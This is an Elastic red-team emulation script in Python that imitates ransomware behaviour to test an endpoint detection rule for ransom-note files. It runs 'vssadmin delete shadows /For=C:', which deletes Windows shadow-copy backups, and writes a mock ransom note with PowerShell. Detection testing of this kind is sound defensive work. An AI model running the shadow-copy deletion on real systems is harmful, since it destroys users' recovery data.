33 lines
1.0 KiB
Python
33 lines
1.0 KiB
Python
# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
|
|
# or more contributor license agreements. Licensed under the Elastic License
|
|
# 2.0; you may not use this file except in compliance with the Elastic License
|
|
# 2.0.
|
|
|
|
from . import common
|
|
from . import RtaMetadata
|
|
|
|
|
|
metadata = RtaMetadata(
|
|
uuid="2ab87570-d9ad-40f4-9f52-d5a2942e11ac",
|
|
platforms=["windows"],
|
|
endpoint=[{"rule_name": "Potential Ransomware Note File", "rule_id": "5dba1130-72df-46f1-b581-18d9c866cb23"}],
|
|
siem=[],
|
|
techniques=["T1485"],
|
|
)
|
|
|
|
|
|
@common.requires_os(metadata.platforms)
|
|
def main():
|
|
vssadmin = "C:\\Windows\\System32\\vssadmin.exe"
|
|
powershell = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
|
|
|
|
# Execute command
|
|
common.log("Deleting Shadow Copies and writing ransom note")
|
|
common.execute([vssadmin, "delete", "shadows", "/For=C:"], timeout=10)
|
|
|
|
common.execute([powershell, "/c", "echo 'Ooops! All your' > readme.txt"], timeout=10)
|
|
|
|
|
|
if __name__ == "__main__":
|
|
exit(main())
|